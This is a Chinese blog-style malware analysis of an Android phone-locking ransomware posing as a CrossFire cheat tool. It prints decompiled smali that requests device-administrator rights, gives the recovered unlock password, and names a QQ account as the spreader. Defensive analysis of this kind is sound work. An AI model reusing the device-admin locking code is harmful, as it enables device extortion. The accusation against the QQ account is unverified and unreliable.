事情的起因是这样的，群里有位小朋友的手机被锁了，问及原因，原来是下载了一个名叫“cf外挂助手激活版”的这么一个软件，我收到了这份软件之后看到他是这样的...

emmm....才二百多kb，看来这是个不折不扣的小白了

从大小上来分析，只有二百多kb的“外挂”肯定是有猫腻的

从名字上来看，也很有问题，接下来我果断百度了下这个名字

emmmmm...........这样一来便更加深了我对他小白的印象

接下来我将这个文件上传到哈勃分析系统（https://habo.qq.com/）

得出文件MD5值：703b33a0def90c8d689881017878ae2d 百度搜索没有任何有关此MD5的信息，接下来进行逆向工作

工具：Android killer

将.apk文件放入Android killer中，发现入口M，查看代码信息：

.class public Lcom/h/M;
.super Landroid/app/Activity;
.source "M.java"

# direct methods
.method public constructor <init>()V
    .locals 3

.prologue
    .line 25
    move-object v0, p0

move-object v2, v0

invoke-direct {v2}, Landroid/app/Activity;-><init>()V

return-void
.end method

.method private activiteDevice()V
    .locals 13
    .annotation system Ldalvik/annotation/Signature;
        value = {
            "()V"
        }
    .end annotation

.prologue
    .line 19
    move-object v0, p0

new-instance v5, Landroid/content/Intent;

move-object v12, v5

move-object v5, v12

move-object v6, v12

const-string v7, "android.app.action.ADD_DEVICE_ADMIN"

invoke-direct {v6, v7}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V

move-object v1, v5

.line 20
    new-instance v5, Landroid/content/ComponentName;

move-object v12, v5

move-object v5, v12

move-object v6, v12

move-object v7, v0

:try_start_0
    const-string v8, "com.h.MyAdmin"

invoke-static {v8}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
    :try_end_0
    .catch Ljava/lang/ClassNotFoundException; {:try_start_0 .. :try_end_0} :catch_0

move-result-object v8

invoke-direct {v6, v7, v8}, Landroid/content/ComponentName;-><init>(Landroid/content/Context;Ljava/lang/Class;)V

move-object v2, v5

.line 21
    move-object v5, v1

const-string v6, "android.app.extra.DEVICE_ADMIN"

move-object v7, v2

invoke-virtual {v5, v6, v7}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Landroid/os/Parcelable;)Landroid/content/Intent;

move-result-object v5

.line 24
    move-object v5, v0

move-object v6, v1

const/4 v7, 0x0

invoke-virtual {v5, v6, v7}, Lcom/h/M;->startActivityForResult(Landroid/content/Intent;I)V

return-void

.line 20
    :catch_0
    move-exception v5

move-object v3, v5

new-instance v5, Ljava/lang/NoClassDefFoundError;

move-object v12, v5

move-object v5, v12

move-object v6, v12

move-object v7, v3

invoke-virtual {v7}, Ljava/lang/Throwable;->getMessage()Ljava/lang/String;

move-result-object v7

invoke-direct {v6, v7}, Ljava/lang/NoClassDefFoundError;-><init>(Ljava/lang/String;)V

throw v5
.end method

# virtual methods
.method public onCreate(Landroid/os/Bundle;)V
    .locals 5
    .annotation system Ldalvik/annotation/Signature;
        value = {
            "(",
            "Landroid/os/Bundle;",
            ")V"
        }
    .end annotation

.annotation runtime Ljava/lang/Override;
    .end annotation

.prologue
    move-object v0, p0

move-object v1, p1

move-object v3, v0

invoke-static {v3}, LLogCatBroadcaster;->start(Landroid/content/Context;)V

.line 13
    move-object v3, v0

move-object v4, v1

invoke-super {v3, v4}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V

.line 14
    move-object v3, v0

invoke-direct {v3}, Lcom/h/M;->activiteDevice()V

return-void
.end method

未发现有意义的线索，接下来尝试搜索“序列号”

bingo!!只有一个搜索结果,嗅到了成功的味道

nice，成功找到密码：beautifulflower，前提是得使得序列号为0，这里就需要手机进行双清操作了，没办法，谁让贪小便宜呢

顺便挂下传播勒索软件人的qq:543892683，相信这也不是他本人做的，应该是网上找的一键生成程序

顺便告诫下大家，莫贪小便宜，不要随便下群里所谓的“黑客工具”“盗号软件”“辅助外挂”之类的东西，十有八九都是有病毒的